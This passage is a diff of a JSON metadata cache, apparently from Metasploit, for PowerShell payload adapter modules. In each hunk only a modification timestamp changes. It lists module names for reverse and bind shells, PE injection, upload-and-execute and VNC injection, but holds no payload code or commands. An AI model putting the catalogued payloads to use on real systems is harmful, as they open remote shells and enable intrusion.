    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/find_tag",
@@ -174608,7 +177828,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp",
@@ -174644,7 +177864,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe",
@@ -174680,7 +177900,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp",
@@ -174716,7 +177936,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp",
@@ -174754,7 +177974,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp",
@@ -174792,7 +178012,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports",
@@ -174831,7 +178051,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns",
@@ -174871,7 +178091,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4",
@@ -174911,7 +178131,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns",
@@ -174948,7 +178168,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid",
@@ -174983,7 +178203,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/pingback_bind_tcp",
@@ -175018,7 +178238,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/pingback_reverse_tcp",
@@ -175056,7 +178276,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_bind_tcp",
@@ -175094,7 +178314,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_reverse_tcp",
@@ -175132,7 +178352,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl",
@@ -175171,7 +178391,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp",
@@ -175210,7 +178430,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp",
@@ -175248,7 +178468,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp",
@@ -175287,7 +178507,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid",
@@ -175324,7 +178544,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_named_pipe",
@@ -175361,7 +178581,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp",
@@ -175399,7 +178619,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp",
@@ -175439,7 +178659,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4",
@@ -175477,7 +178697,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid",
@@ -175514,7 +178734,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/find_tag",
@@ -175552,7 +178772,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp",
@@ -175589,7 +178809,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp",
@@ -175625,7 +178845,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp",
@@ -175663,7 +178883,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp",
@@ -175701,7 +178921,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports",
@@ -175740,7 +178960,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns",
@@ -175780,7 +179000,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4",
@@ -175820,7 +179040,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns",
@@ -175858,7 +179078,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid",
@@ -175895,7 +179115,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_udp",
@@ -175931,7 +179151,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_bind_tcp",
@@ -175966,7 +179186,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw",
@@ -176003,7 +179223,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp",
@@ -176039,7 +179259,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_reverse_tcp",
@@ -176074,7 +179294,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/speak_pwned",
@@ -176113,7 +179333,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp",
@@ -176152,7 +179372,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp",
@@ -176190,7 +179410,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp",
@@ -176229,7 +179449,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid",
@@ -176266,7 +179486,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_named_pipe",
@@ -176302,7 +179522,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_nonx_tcp",
@@ -176340,7 +179560,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp",
@@ -176380,7 +179600,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4",
@@ -176418,7 +179638,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid",
@@ -176455,7 +179675,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/find_tag",
@@ -176493,7 +179713,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp",
@@ -176529,7 +179749,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp",
@@ -176566,7 +179786,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp",
@@ -176604,7 +179824,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp",
@@ -176642,7 +179862,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports",
@@ -176681,7 +179901,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns",
@@ -176721,7 +179941,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4",
@@ -176761,7 +179981,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns",
@@ -176799,7 +180019,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_uuid",
@@ -176836,7 +180056,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_udp",
@@ -176875,7 +180095,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp",
@@ -176914,7 +180134,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp",
@@ -176952,7 +180172,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp",
@@ -176991,7 +180211,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid",
@@ -177028,7 +180248,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe",
@@ -177065,7 +180285,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp",
@@ -177103,7 +180323,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp",
@@ -177143,7 +180363,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4",
@@ -177181,7 +180401,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid",
@@ -177218,7 +180438,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/find_tag",
@@ -177257,7 +180477,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_hop_http",
@@ -177294,7 +180514,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_http",
@@ -177331,7 +180551,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore",
@@ -177369,7 +180589,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp",
@@ -177406,7 +180626,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp",
@@ -177443,7 +180663,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp",
@@ -177481,7 +180701,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp",
@@ -177519,7 +180739,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports",
@@ -177558,7 +180778,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns",
@@ -177598,7 +180818,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4",
@@ -177638,7 +180858,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns",
@@ -177676,7 +180896,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
